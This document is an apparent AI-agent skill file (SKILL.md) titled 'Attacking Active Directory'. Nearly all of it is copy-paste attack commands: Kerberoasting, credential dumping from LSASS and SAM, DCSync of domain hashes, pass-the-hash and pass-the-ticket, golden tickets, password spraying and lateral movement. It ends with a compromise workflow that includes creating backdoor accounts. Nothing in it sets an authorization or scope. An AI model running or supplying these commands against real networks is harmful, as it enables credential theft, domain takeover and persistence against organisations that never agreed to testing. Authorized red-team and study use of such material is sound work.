Skills
NYC
skills/smithery/ai/attacking-active-directory

attacking-active-directory

SKILL.md

Attacking Active Directory

When to Use

  • AD reconnaissance and enumeration
  • Kerberos-based attacks
  • Credential dumping from domain controllers
  • Lateral movement within domains
  • BloodHound attack path analysis
  • Domain persistence techniques

Kerberoasting

Windows:

# Check kerberoastable users
.\Rubeus.exe kerberoast /stats

# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt

# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap

Linux:

# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt

# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt

# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password

Crack Hashes:

# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt

# John
john --wordlist=wordlist.txt hashes.txt

ASREPRoasting

Windows:

# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired

# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat

Linux:

# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt

# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10

Crack AS-REP:

hashcat -m 18200 hashes.txt wordlist.txt

BloodHound

Data Collection:

# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup

Linux:

# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip

Useful Queries:

# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p

# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u

# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p

Credential Dumping

LSASS Dumping:

# Task Manager: Right-click lsass.exe -> Create dump file

# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

SAM Dumping:

# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL

DCSync (Domain):

# secretsdump - dump all
secretsdump.py domain.local/user:password@dc.domain.local -just-dc

# Specific user
secretsdump.py domain.local/user:password@dc.domain.local -just-dc-user krbtgt

# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/user@dc.domain.local -just-dc

Pass-the-Hash

Windows:

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe

Linux:

# CrackMapExec
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami

# psexec
psexec.py -hashes :hash administrator@10.10.10.10

# wmiexec
wmiexec.py -hashes :hash administrator@10.10.10.10

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash

Pass-the-Ticket

Export Tickets:

# Mimikatz
sekurlsa::tickets /export

# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10

Import/Use Tickets:

# Mimikatz
kerberos::ptt ticket.kirbi

# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket

# Verify
klist

Linux PtT:

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

# Set ticket
export KRB5CCNAME=ticket.ccache

# Use ticket
psexec.py -k -no-pass domain.local/administrator@dc.domain.local

Overpass-the-Hash

# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt

# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt

Golden/Silver Tickets

Golden Ticket (TGT):

# Requirements: krbtgt hash, Domain SID

# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt

Silver Ticket (TGS):

# Requirements: Service account hash, Service SPN

# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt

Lateral Movement

CrackMapExec:

# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password

# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami

# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam

# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa

PSExec Variants:

# psexec
psexec.py domain/user:password@10.10.10.10

# wmiexec (stealthier)
wmiexec.py domain/user:password@10.10.10.10

# smbexec (no service)
smbexec.py domain/user:password@10.10.10.10

WinRM:

# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash

Enumeration

Domain Info:

# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

Linux Enumeration:

# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups

# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"

Quick Workflow

  1. Initial Access → Get domain credentials
  2. Enumeration → Run BloodHound collection
  3. Kerberoasting → Extract and crack service tickets
  4. Lateral Movement → Use creds to move to high-value targets
  5. Credential Dumping → Dump LSASS/SAM on compromised hosts
  6. DCSync → Extract all domain hashes from DC
  7. Persistence → Golden ticket or create backdoor accounts

Common Wins

  • Kerberoasting weak service account passwords
  • ASREPRoasting accounts without preauth
  • BloodHound finding short paths to DA
  • Pass-the-Hash from dumped credentials
  • DCSync with compromised accounts that have replication rights

Tools

  • Rubeus - Kerberos attacks (Windows)
  • Mimikatz - Credential dumping (Windows)
  • Impacket - Comprehensive toolkit (Linux)
  • BloodHound - AD relationship graphing
  • CrackMapExec - Swiss army knife for AD
  • PowerView - AD enumeration (PowerShell)
  • evil-winrm - WinRM access (Linux)

References

Weekly Installs
1
Repository
smithery/ai
First Seen
12 days ago
Installed on
kilo1
claude-code1